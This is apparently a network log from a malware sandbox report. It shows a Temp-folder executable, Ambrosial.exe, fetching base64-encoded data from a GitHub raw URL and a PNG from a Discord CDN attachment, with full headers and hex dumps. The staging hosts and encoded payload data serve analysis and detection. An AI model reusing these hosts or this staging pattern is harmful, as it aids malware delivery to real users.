                                                                                                                                                                                      2021-10-30 11:51:36 UTC6INData Raw: 53 45 46 4a 4c 30 4e 35 65 54 56 75 5a 6d 6c 7a 63 7a 59 34 57 54 4e 52 65 46 5a 4e 4d 6e 67 31 65 47 52 78 62 58 4e 49 61 6a 5a 43 4e 6a 52 4f 64 44 64 58 57 58 70 59 55 30 78 52 4d 6d 4e 47 64 7a 68 42 57 43 39 4c 51 58 5a 4c 64 30 5a 51 62 33 4a 77 4f 55 67 7a 64 47 35 73 56 33 5a 42 4f 48 70 71 4d 30 56 68 52 6d 68 43 56 7a 42 5a 64 30 45 76 59 55 34 79 52 6d 31 33 61 6e 56 71 63 32 5a 42 4e 7a 5a 79 63 57 5a 4b 4e 33 46 53 4e 31 42 34 63 48 42 53 63 6e 46 76 4d 6b 31 42 5a 6b 52 45 65 6b 30 31 52 46 5a 73 51 57 6f 35 57 6d 64 4e 54 6d 6c 45 52 46 64 4f 53 6e 56 75 5a 6d 78 61 64 47 78 78 5a 31 41 34 63 53 39 30 55 6a 6c 50 4f 55 6c 59 52 31 64 44 51 56 56 59 4e 46 4a 57 59 6c 52 46 5a 57 5a 54 62 56 52 36 59 33 4d 77 62 58 4e 46 4d 55 51 35 65 48 52
                                                                                                                                                                                      Data Ascii: SEFJL0N5eTVuZmlzczY4WTNReFZNMng1eGRxbXNIajZCNjROdDdXWXpYU0xRMmNGdzhBWC9LQXZLd0ZQb3JwOUgzdG5sV3ZBOHpqM0VhRmhCVzBZd0EvYU4yRm13anVqc2ZBNzZycWZKN3FSN1B4cHBScnFvMk1BZkREek01RFZsQWo5WmdNTmlERFdOSnVuZmxadGxxZ1A4cS90UjlPOUlYR1dDQVVYNFJWYlRFZWZTbVR6Y3MwbXNFMUQ5eHR
                                                                                                                                                                                      2021-10-30 11:51:36 UTC7INData Raw: 39 55 61 32 4d 31 57 54 51 7a 4e 58 4e 56 4d 30 31 6e 59 6a 42 30 53 54 4a 68 4e 58 4d 34 54 30 52 4f 56 53 38 35 61 6c 51 33 55 6b 6f 35 63 6e 56 50 4c 32 70 6c 5a 33 59 35 5a 44 56 54 51 6a 4e 43 5a 6e 45 7a 4e 32 46 31 62 32 6c 35 65 46 4a 4f 64 44 64 56 57 44 68 34 53 55 64 70 59 58 55 34 56 6a 4a 32 63 6b 4e 59 57 6b 78 53 4f 57 55 32 62 58 4a 76 65 6a 64 7a 5a 6a 5a 4b 61 6b 5a 53 62 6b 78 77 52 58 46 4b 63 31 56 4b 56 7a 46 75 63 7a 52 6a 4c 30 70 55 52 46 6c 5a 59 33 4e 59 53 45 74 51 54 47 39 70 54 46 45 35 54 31 5a 68 55 6a 4e 32 64 45 64 78 51 57 52 68 4e 45 4e 4f 4d 47 56 79 62 45 78 52 5a 57 4a 32 53 47 39 30 63 7a 42 45 62 30 52 57 5a 7a 52 32 4e 7a 42 53 62 33 4a 35 64 53 74 36 54 45 31 49 53 55 56 4b 65 58 56 68 5a 48 68 4a 5a 55 4e 6e 63
                                                                                                                                                                                      Data Ascii: 9Ua2M1WTQzNXNVM01nYjB0STJhNXM4T0ROVS85alQ3Uko5cnVPL2plZ3Y5ZDVTQjNCZnEzN2F1b2l5eFJOdDdVWDh4SUdpYXU4VjJ2ckNYWkxSOWU2bXJvejdzZjZKakZSbkxwRXFKc1VKVzFuczRjL0pURFlZY3NYSEtQTG9pTFE5T1ZhUjN2dEdxQWRhNENOMGVybExRZWJ2SG90czBEb0RWZzR2NzBSb3J5dSt6TE1ISUVKeXVhZHhJZUNnc
                                                                                                                                                                                      2021-10-30 11:51:36 UTC9INData Raw: 64 31 52 4c 4b 31 52 45 5a 46 42 47 62 47 35 51 4f 54 49 72 55 30 6c 55 63 6e 6f 72 57 6e 46 59 51 69 39 35 55 44 55 7a 56 6d 52 58 63 47 78 7a 64 7a 46 7a 54 6b 4e 4f 55 54 56 4b 57 6e 6c 57 4d 46 52 70 61 33 4a 35 4b 30 73 79 65 6d 4a 47 57 6d 46 73 52 55 39 36 63 46 52 4c 65 6a 41 72 4e 47 6b 77 4f 46 46 6a 4e 55 78 6b 61 6c 70 36 59 33 5a 75 62 6b 56 42 4d 57 38 7a 5a 47 6b 31 55 57 39 53 51 58 4e 31 53 56 4a 69 62 58 4a 76 62 32 68 55 5a 44 4e 4e 65 54 4a 53 51 54 64 76 55 6d 31 72 57 45 4e 4b 52 48 4a 74 5a 7a 46 76 56 57 68 5a 57 47 31 6b 51 56 46 43 4b 32 56 33 56 7a 68 78 64 6b 70 4f 52 6b 4e 78 53 33 4e 58 63 54 41 76 56 54 4e 76 63 44 4e 58 59 33 70 79 57 48 45 76 56 47 77 34 52 47 5a 6c 4e 44 52 35 5a 53 74 50 53 46 68 35 5a 47 31 77 62 57 39
                                                                                                                                                                                      Data Ascii: d1RLK1REZFBGbG5QOTIrU0lUcnorWnFYQi95UDUzVmRXcGxzdzFzTkNOUTVKWnlWMFRpa3J5K0syemJGWmFsRU96cFRLejArNGkwOFFjNUxkalp6Y3ZubkVBMW8zZGk1UW9SQXN1SVJibXJvb2hUZDNNeTJSQTdvUm1rWENKRHJtZzFvVWhZWG1kQVFCK2V3VzhxdkpORkNxS3NXcTAvVTNvcDNXY3pyWHEvVGw4RGZlNDR5ZStPSFh5ZG1wbW9


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      1192.168.2.349742185.199.108.133443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:51:36 UTC9OUTGET /disepi/ambrosial/main/cachedclients.json HTTP/1.1
                                                                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                                                                      2021-10-30 11:51:36 UTC9INHTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 9177
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                      ETag: "b73e61c048177e6100edd057ccc9bc210cfbebad08e902e11397725130a4c078"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: C188:CB26:9A12A9:A6C643:617D1DCD
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:51:36 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6949-MXP
                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                      X-Cache-Hits: 1
                                                                                                                                                                                      X-Timer: S1635594697.981948,VS0,VE0
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: 9d49c70d007f1c311b2207dfe87b696314ff10b3
                                                                                                                                                                                      Expires: Sat, 30 Oct 2021 11:56:36 GMT
                                                                                                                                                                                      Source-Age: 0
                                                                                                                                                                                      2021-10-30 11:51:36 UTC10INData Raw: 61 6d 56 55 5a 45 46 54 4e 44 6c 7a 4e 6d 70 51 5a 33 6c 77 56 46 56 77 54 56 70 47 62 33 56 55 62 48 46 4a 63 55 51 77 4d 6b 5a 68 56 56 64 4d 63 54 4e 79 53 6d 74 76 56 6d 6f 76 63 46 46 47 63 58 68 55 51 30 78 50 4f 53 39 55 56 30 46 36 4e 45 78 45 62 6c 45 35 4d 58 52 36 4e 33 70 4a 51 30 68 51 59 32 68 52 5a 6b 39 6a 54 6c 56 45 4e 45 35 4b 55 55 4a 4a 56 48 64 6d 52 55 56 57 4e 32 74 4b 62 6e 67 30 63 7a 46 61 53 43 74 72 59 6b 6c 6d 54 55 39 55 62 6c 56 4d 54 44 52 46 57 6c 6b 31 52 6b 39 6d 52 45 52 44 59 6c 4e 72 4f 57 78 70 54 57 35 5a 5a 55 6c 78 51 6b 39 58 62 6d 6f 7a 62 45 31 71 4d 58 70 6b 57 54 4a 56 52 6d 6c 6a 4f 55 31 32 64 69 39 4e 64 47 34 77 64 57 45 78 4f 45 38 35 4e 44 42 69 52 58 4d 32 4e 44 51 77 5a 44 64 76 52 57 6c 58 56 30 64
                                                                                                                                                                                      Data Ascii: amVUZEFTNDlzNmpQZ3lwVFVwTVpGb3VUbHFJcUQwMkZhVVdMcTNySmtvVmovcFFGcXhUQ0xPOS9UV0F6NExEblE5MXR6N3pJQ0hQY2hRZk9jTlVENE5KUUJJVHdmRUVWN2tKbng0czFaSCtrYklmTU9UblVMTDRFWlk1Rk9mRERDYlNrOWxpTW5ZZUlxQk9XbmozbE1qMXpkWTJVRmljOU12di9NdG4wdWExOE85NDBiRXM2NDQwZDdvRWlXV0d
                                                                                                                                                                                      2021-10-30 11:51:36 UTC12INData Raw: 64 61 64 53 74 4a 65 6c 70 59 56 54 64 58 4f 56 5a 6e 65 55 5a 6d 4b 30 5a 47 62 7a 6b 79 56 30 6f 31 4c 31 59 30 52 46 45 35 53 7a 5a 6e 5a 44 6c 47 59 58 4d 35 55 30 59 7a 61 45 49 32 55 58 70 48 56 48 56 48 52 57 4e 6e 5a 6e 42 45 4e 6b 39 4a 61 45 51 31 65 6c 46 31 55 6c 52 70 51 6d 45 32 61 54 45 76 54 58 5a 77 61 32 46 46 53 54 56 55 57 6c 52 50 62 32 4a 31 51 6e 5a 35 62 6b 35 77 64 32 77 35 51 55 4d 72 4d 58 56 74 4d 45 6c 76 4d 6e 59 30 57 48 64 42 54 33 4e 7a 54 6e 6f 32 56 6e 52 71 65 45 74 59 63 6b 38 31 63 33 46 35 62 6c 4e 42 64 79 74 73 55 58 5a 33 4e 6c 42 36 55 6b 78 76 64 33 42 45 61 6e 63 78 5a 53 39 6e 63 6d 38 76 4c 30 5a 32 54 32 74 36 61 48 6f 30 4e 7a 46 36 52 55 34 77 4f 47 4e 74 52 55 35 70 4d 6b 64 57 5a 54 56 4a 64 6a 64 6b 51
                                                                                                                                                                                      Data Ascii: dadStJelpYVTdXOVZneUZmK0ZGbzkyV0o1L1Y0RFE5SzZnZDlGYXM5U0YzaEI2UXpHVHVHRWNnZnBENk9JaEQ1elF1UlRpQmE2aTEvTXZwa2FFSTVUWlRPb2J1QnZ5bk5wd2w5QUMrMXVtMElvMnY0WHdBT3NzTno2VnRqeEtYck81c3F5blNBdytsUXZ3NlB6Ukxvd3BEancxZS9ncm8vL0Z2T2t6aHo0NzF6RU4wOGNtRU5pMkdWZTVJdjdkQ
                                                                                                                                                                                      2021-10-30 11:51:36 UTC13INData Raw: 4e 46 4e 4e 52 6d 39 31 53 48 46 6e 4f 57 5a 44 53 30 6f 76 62 7a 56 6f 52 44 4e 44 51 33 46 4d 4d 48 55 32 4e 55 6c 71 56 6d 59 72 59 32 5a 4b 61 45 5a 4b 63 55 31 76 4e 45 6f 76 64 6e 56 48 5a 55 70 73 4d 56 59 76 62 31 42 6b 51 54 51 72 53 44 6c 6a 53 31 6c 45 63 6c 42 68 62 46 64 6f 53 44 55 32 51 56 42 6f 4c 30 64 45 59 7a 42 54 4b 30 4a 52 62 31 51 30 64 46 46 54 5a 47 35 34 53 57 6c 31 59 32 64 5a 5a 47 39 52 64 56 56 49 65 45 34 31 51 7a 42 73 52 32 78 7a 51 6a 52 4b 64 6c 5a 44 65 45 4d 32 61 58 4a 30 55 30 64 34 5a 7a 4a 59 57 54 4a 4d 64 6e 4e 48 63 58 55 32 4d 32 31 74 4f 53 73 30 65 6c 4e 5a 62 45 74 75 4e 56 4e 31 57 58 56 4f 53 32 4a 59 62 6e 6c 4f 64 44 64 75 4d 6a 56 49 54 33 42 5a 64 6c 6c 79 65 48 5a 4c 57 57 70 33 62 30 78 42 61 57 63
                                                                                                                                                                                      Data Ascii: NFNNRm91SHFnOWZDS0ovbzVoRDNDQ3FMMHU2NUlqVmYrY2ZKaEZKcU1vNEovdnVHZUpsMVYvb1BkQTQrSDljS1lEclBhbFdoSDU2QVBoL0dEYzBTK0JRb1Q0dFFTZG54SWl1Y2dZZG9RdVVIeE41QzBsR2xzQjRKdlZDeEM2aXJ0U0d4ZzJYWTJMdnNHcXU2M21tOSs0elNZbEtuNVN1WXVOS2JYbnlOdDduMjVIT3BZdllyeHZLWWp3b0xBaWc
                                                                                                                                                                                      2021-10-30 11:51:36 UTC14INData Raw: 46 6f 54 6d 4a 55 5a 56 42 55 63 48 56 72 64 55 4a 6e 56 30 77 7a 62 32 5a 31 4d 69 74 47 59 58 41 32 57 6b 46 59 55 46 4e 57 55 31 52 31 53 57 64 33 5a 44 52 6f 63 7a 52 4a 56 47 35 33 54 44 56 6f 54 56 49 32 63 57 64 75 61 55 78 51 4e 6b 52 4b 53 58 4e 58 53 31 46 54 62 53 74 57 53 7a 4a 57 4d 31 4a 32 65 45 46 49 53 6d 39 43 64 30 70 68 59 6b 70 71 5a 56 64 78 52 6b 77 7a 65 55 64 46 55 32 39 6b 52 6d 31 44 52 44 6c 30 63 46 4e 56 61 47 4e 72 54 56 68 6c 52 54 4d 35 55 47 52 72 65 6c 56 6b 64 30 6c 4d 62 30 78 42 4d 6c 70 42 4d 48 4e 4e 56 6b 4e 59 54 47 6c 44 64 58 6c 49 64 58 4e 45 62 48 6b 30 51 7a 4e 53 54 33 6b 7a 4f 47 74 51 62 46 5a 31 55 45 30 7a 59 58 52 6c 65 6a 52 69 64 48 5a 6b 5a 32 35 6f 62 58 64 49 4c 32 46 46 4d 6b 64 36 54 45 5a 4c 57
                                                                                                                                                                                      Data Ascii: FoTmJUZVBUcHVrdUJnV0wzb2Z1MitGYXA2WkFYUFNWU1R1SWd3ZDRoczRJVG53TDVoTVI2cWduaUxQNkRKSXNXS1FTbStWSzJWM1J2eEFISm9Cd0phYkpqZVdxRkwzeUdFU29kRm1DRDl0cFNVaGNrTVhlRTM5UGRrelVkd0lMb0xBMlpBMHNNVkNYTGlDdXlIdXNEbHk0QzNST3kzOGtQbFZ1UE0zYXRlejRidHZkZ25obXdIL2FFMkd6TEZLW
                                                                                                                                                                                      2021-10-30 11:51:36 UTC16INData Raw: 53 45 46 4a 4c 30 4e 35 65 54 56 75 5a 6d 6c 7a 63 7a 59 34 57 54 4e 52 65 46 5a 4e 4d 6e 67 31 65 47 52 78 62 58 4e 49 61 6a 5a 43 4e 6a 52 4f 64 44 64 58 57 58 70 59 55 30 78 52 4d 6d 4e 47 64 7a 68 42 57 43 39 4c 51 58 5a 4c 64 30 5a 51 62 33 4a 77 4f 55 67 7a 64 47 35 73 56 33 5a 42 4f 48 70 71 4d 30 56 68 52 6d 68 43 56 7a 42 5a 64 30 45 76 59 55 34 79 52 6d 31 33 61 6e 56 71 63 32 5a 42 4e 7a 5a 79 63 57 5a 4b 4e 33 46 53 4e 31 42 34 63 48 42 53 63 6e 46 76 4d 6b 31 42 5a 6b 52 45 65 6b 30 31 52 46 5a 73 51 57 6f 35 57 6d 64 4e 54 6d 6c 45 52 46 64 4f 53 6e 56 75 5a 6d 78 61 64 47 78 78 5a 31 41 34 63 53 39 30 55 6a 6c 50 4f 55 6c 59 52 31 64 44 51 56 56 59 4e 46 4a 57 59 6c 52 46 5a 57 5a 54 62 56 52 36 59 33 4d 77 62 58 4e 46 4d 55 51 35 65 48 52
                                                                                                                                                                                      Data Ascii: SEFJL0N5eTVuZmlzczY4WTNReFZNMng1eGRxbXNIajZCNjROdDdXWXpYU0xRMmNGdzhBWC9LQXZLd0ZQb3JwOUgzdG5sV3ZBOHpqM0VhRmhCVzBZd0EvYU4yRm13anVqc2ZBNzZycWZKN3FSN1B4cHBScnFvMk1BZkREek01RFZsQWo5WmdNTmlERFdOSnVuZmxadGxxZ1A4cS90UjlPOUlYR1dDQVVYNFJWYlRFZWZTbVR6Y3MwbXNFMUQ5eHR
                                                                                                                                                                                      2021-10-30 11:51:36 UTC17INData Raw: 39 55 61 32 4d 31 57 54 51 7a 4e 58 4e 56 4d 30 31 6e 59 6a 42 30 53 54 4a 68 4e 58 4d 34 54 30 52 4f 56 53 38 35 61 6c 51 33 55 6b 6f 35 63 6e 56 50 4c 32 70 6c 5a 33 59 35 5a 44 56 54 51 6a 4e 43 5a 6e 45 7a 4e 32 46 31 62 32 6c 35 65 46 4a 4f 64 44 64 56 57 44 68 34 53 55 64 70 59 58 55 34 56 6a 4a 32 63 6b 4e 59 57 6b 78 53 4f 57 55 32 62 58 4a 76 65 6a 64 7a 5a 6a 5a 4b 61 6b 5a 53 62 6b 78 77 52 58 46 4b 63 31 56 4b 56 7a 46 75 63 7a 52 6a 4c 30 70 55 52 46 6c 5a 59 33 4e 59 53 45 74 51 54 47 39 70 54 46 45 35 54 31 5a 68 55 6a 4e 32 64 45 64 78 51 57 52 68 4e 45 4e 4f 4d 47 56 79 62 45 78 52 5a 57 4a 32 53 47 39 30 63 7a 42 45 62 30 52 57 5a 7a 52 32 4e 7a 42 53 62 33 4a 35 64 53 74 36 54 45 31 49 53 55 56 4b 65 58 56 68 5a 48 68 4a 5a 55 4e 6e 63
                                                                                                                                                                                      Data Ascii: 9Ua2M1WTQzNXNVM01nYjB0STJhNXM4T0ROVS85alQ3Uko5cnVPL2plZ3Y5ZDVTQjNCZnEzN2F1b2l5eFJOdDdVWDh4SUdpYXU4VjJ2ckNYWkxSOWU2bXJvejdzZjZKakZSbkxwRXFKc1VKVzFuczRjL0pURFlZY3NYSEtQTG9pTFE5T1ZhUjN2dEdxQWRhNENOMGVybExRZWJ2SG90czBEb0RWZzR2NzBSb3J5dSt6TE1ISUVKeXVhZHhJZUNnc
                                                                                                                                                                                      2021-10-30 11:51:36 UTC18INData Raw: 64 31 52 4c 4b 31 52 45 5a 46 42 47 62 47 35 51 4f 54 49 72 55 30 6c 55 63 6e 6f 72 57 6e 46 59 51 69 39 35 55 44 55 7a 56 6d 52 58 63 47 78 7a 64 7a 46 7a 54 6b 4e 4f 55 54 56 4b 57 6e 6c 57 4d 46 52 70 61 33 4a 35 4b 30 73 79 65 6d 4a 47 57 6d 46 73 52 55 39 36 63 46 52 4c 65 6a 41 72 4e 47 6b 77 4f 46 46 6a 4e 55 78 6b 61 6c 70 36 59 33 5a 75 62 6b 56 42 4d 57 38 7a 5a 47 6b 31 55 57 39 53 51 58 4e 31 53 56 4a 69 62 58 4a 76 62 32 68 55 5a 44 4e 4e 65 54 4a 53 51 54 64 76 55 6d 31 72 57 45 4e 4b 52 48 4a 74 5a 7a 46 76 56 57 68 5a 57 47 31 6b 51 56 46 43 4b 32 56 33 56 7a 68 78 64 6b 70 4f 52 6b 4e 78 53 33 4e 58 63 54 41 76 56 54 4e 76 63 44 4e 58 59 33 70 79 57 48 45 76 56 47 77 34 52 47 5a 6c 4e 44 52 35 5a 53 74 50 53 46 68 35 5a 47 31 77 62 57 39
                                                                                                                                                                                      Data Ascii: d1RLK1REZFBGbG5QOTIrU0lUcnorWnFYQi95UDUzVmRXcGxzdzFzTkNOUTVKWnlWMFRpa3J5K0syemJGWmFsRU96cFRLejArNGkwOFFjNUxkalp6Y3ZubkVBMW8zZGk1UW9SQXN1SVJibXJvb2hUZDNNeTJSQTdvUm1rWENKRHJtZzFvVWhZWG1kQVFCK2V3VzhxdkpORkNxS3NXcTAvVTNvcDNXY3pyWHEvVGw4RGZlNDR5ZStPSFh5ZG1wbW9


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      10192.168.2.349757162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:21 UTC752OUTGET /attachments/489891892142669842/835660013732626522/ataniclassic.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      2021-10-30 11:52:21 UTC752INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:21 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 45109
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646fdf7e435c38-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 2409299
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "e5ef6bdf0c495893af82822f51711550"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:21 GMT
                                                                                                                                                                                      Last-Modified: Sat, 24 Apr 2021 23:34:33 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1619307273119472
                                                                                                                                                                                      x-goog-hash: crc32c=MG/HgQ==
                                                                                                                                                                                      x-goog-hash: md5=5e9r3wxJWJOvgoIvUXEVUA==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 45109
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdspesRjh5dI-f9WhmgiYKMGlO744ai1a-fyvrp_KrHF--_bC5e7xDQ0-naM-GyKFrh8SriXSZ-RVxpBkrwuRzUuQYTAkQ
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gT3EOsylgxak8ILpc%2FW6cO5k79WBaU1JupjFuLGZoVsTTpjTydLIa%2BNq5KfwqNQ7unHI6BZF%2BkMmVFR969vNtviLSkxR2HSG%2B6KKeuJKm%2B8%2BqlE74NNsahzTsH9LVDIntLI8mg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:21 UTC753INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:21 UTC753INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c2 00 00 0e c2 01 15 28 4a 80 00 00 af ca 49 44 41 54 78 5e ed bd 09 d4 ae 6d 59 d6 ff 6e 54 2c 67 45 06 29 07 d0 90 40 44 c0 09 45 90 4c 66 02 57 8a 13 8a e5 14 69 0e 24 0e e5 10 21 59 6a a9 e4 90 9a 26 ab a5 39 24 39 64 a9 59 16 ad 5c a6 59 da 80 a5 14 d5 aa 1c 28 b5 24 9c 32 ff df f1 f0 fe 36 c7 3e be f3 bc 86 fb 79 f6 47 fd f3 b7 d6 b9 ae 73 be 86 fb 7e ee e7 fe de 6f ef 77 df 78 fc e3 1f ff 5b 37 6e dc b8 12 8c 42 7a fa 19 ef 76 b7 bb 9d 46 91 79 99 db 8d d9 c3 47 d1 d5 75 a3 a0 a7 fb 46 f9 2b 79 d5 3a a1 aa f1 9c 8c 0b f4 d1 fe 47 75
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYs(JIDATx^mYnT,gE)@DELfWi$!Yj&9$9dY\Y($26>yGs~owx[7nBzvFyGuF+y:Gu
                                                                                                                                                                                      2021-10-30 11:52:21 UTC754INData Raw: aa 9a f4 69 44 f7 fd 49 7c 8f ee f3 1c f4 24 f7 e4 a4 5d 91 3d 47 76 35 bf 33 8a 67 1f 6c 3f 5b f7 77 a3 70 1d ba bc cc cd bc 1c 05 fa 8d 27 3d e9 49 c3 17 35 c1 0d 96 79 d5 58 e9 62 d6 43 ac f8 18 77 fa 89 95 3c 7a 0a cf ab 72 dd 27 2a bf eb 5d ef 6a 14 55 ac f2 f9 28 2a dd 7d a2 f2 57 eb 03 b7 67 fa 4a 6e 37 57 a7 8b ce ee 46 f0 b9 84 c7 77 74 f7 39 3b fe d1 5a 44 37 57 37 87 18 c5 c4 d1 f8 ac 2e f7 92 a8 de 1f 38 33 ba f9 d4 63 b6 96 0a e6 5e f9 92 49 1b 7c de 95 35 64 7f 8d 95 2f 61 8d 3b 54 fd aa de 2b 54 fb 64 d4 75 4e 9f e7 8b b4 13 5f 2b a2 3d f3 c5 c8 28 f1 ff bd 88 38 9a cb 45 eb cb 35 ba be c2 2c 4f 6b e0 1a b1 d6 ea 27 4c 82 f9 59 53 8e e8 9e 0b d2 e9 e5 3d a5 33 7f fa 9d ac 9d 8d 7e ee 88 fb 85 c6 6e af ae 0b f6 52 ed 6b 87 ec 2b 46 f3 56 ac
                                                                                                                                                                                      Data Ascii: iDI|$]=Gv53gl?[wp'=I5yXbCw<zr'*]jU(*}WgJn7WFwt9;ZD7W7.83c^I|5d/a;T+TduN_+=(8E5,Ok'LYS=3~nRk+FV
                                                                                                                                                                                      2021-10-30 11:52:21 UTC756INData Raw: f2 84 eb b9 ef 64 f4 6c 49 ba fd e7 ba c4 6c 5e 47 f5 d9 c3 7d 3e 22 f4 cf 58 a5 3b 69 af 42 9d ce a0 eb 2d e4 bb f1 f4 a7 3f fd 66 24 0f 2d 6f 26 8d 95 4f e4 4d ca 28 52 cf 9c 1c 57 7a ed c4 76 fa 89 99 ee be ae 77 95 bb 12 13 5d 9e c6 f4 89 4a f7 0f 4b 15 9f d5 43 95 0f e9 cb b3 10 55 fd c8 27 5c 17 69 5f 62 6f 2b ba f0 b9 20 73 44 fa aa 1c 58 a9 17 b3 9e a3 39 3a aa fd 88 59 af 2e 2e ff e9 41 72 3d 26 d4 55 b1 11 b3 f5 ec d0 3d fc 1c b7 bb 2f 04 cf 19 e9 d8 a9 e7 17 27 ba 70 5d b0 7f 1f 25 fa df 69 6e 57 ba 8f 97 44 3d 7d fd e0 7b 71 5d a4 5e 7d 19 fa 98 54 fb e8 72 d3 2f db a5 9b 5b e4 b9 55 cf 32 f0 3a c7 73 b3 5f 8e d0 f9 7d 8e 6a bd a3 38 63 de 6f d0 e5 43 e6 6a 6d 5d 6e 47 ee e7 28 dd 7c 3b 9f d1 d1 98 be ee 33 9a a3 70 5d c8 ee f6 ed 67 d8 51 c5
                                                                                                                                                                                      Data Ascii: dlIl^G}>"X;iB-?f$-o&OM(RWzvw]JKCU'\i_bo+ sDX9:Y..Ar=&U=/'p]%inWD=}{q]^}Tr/[U2:s_}j8coCjm]nG(|;3p]gQ
                                                                                                                                                                                      2021-10-30 11:52:21 UTC757INData Raw: 8c cd d6 31 8a ef 3e 7c c1 eb 6e 3e 48 6d 6f d9 77 66 ef ec 57 b8 0f bd eb e1 73 55 eb ab 7c fa b2 70 5b cc 6c 70 7f 97 03 2b 3d dd 57 7d 31 57 8c fa 8e 62 33 c8 d5 59 8f ea ba 6b d1 b1 9a 5f cd 39 db 0f 76 77 76 a3 9e a3 98 40 f7 f5 57 f1 4b 50 f5 62 4f c4 72 ee f4 77 63 d2 bd 2c 1d c1 cf 26 9f c5 dd b9 89 bc 5e d3 17 35 21 3d fd f9 c5 3c 1b 45 ea d8 b3 5e a2 8b 55 b9 7e 20 ab 75 8c c2 75 c0 97 6b 15 d9 63 14 13 a3 f8 6a 9e 18 c5 bb 9b c2 6b 44 da 62 25 37 73 aa 33 17 33 3d 47 98 d9 a2 db 23 b8 5d e9 39 0a d7 a1 f2 39 a3 fb cd 39 3a 4f fa bb 3c f0 78 9e d1 0a 3b f3 8d 62 3c 7c 94 b3 fb b0 9b ad 61 34 2f ac e4 24 a7 87 e2 75 dd ca 9a 3d a7 db ef 4a 9f 9d b5 1e dd 97 8f 22 7d d5 97 b9 c6 9d fd ec e6 65 4e 57 93 5f ca 15 a3 58 45 95 ef be 95 7e 55 ce ec fa
                                                                                                                                                                                      Data Ascii: 1>|n>HmowfWsU|p[lp+=W}1Wb3Yk_9vwv@WKPbOrwc,&^5!=<E^U~ uukcjkDb%7s33=G#]999:O<x;b<|a4/$u=J"}eNW_XE~U
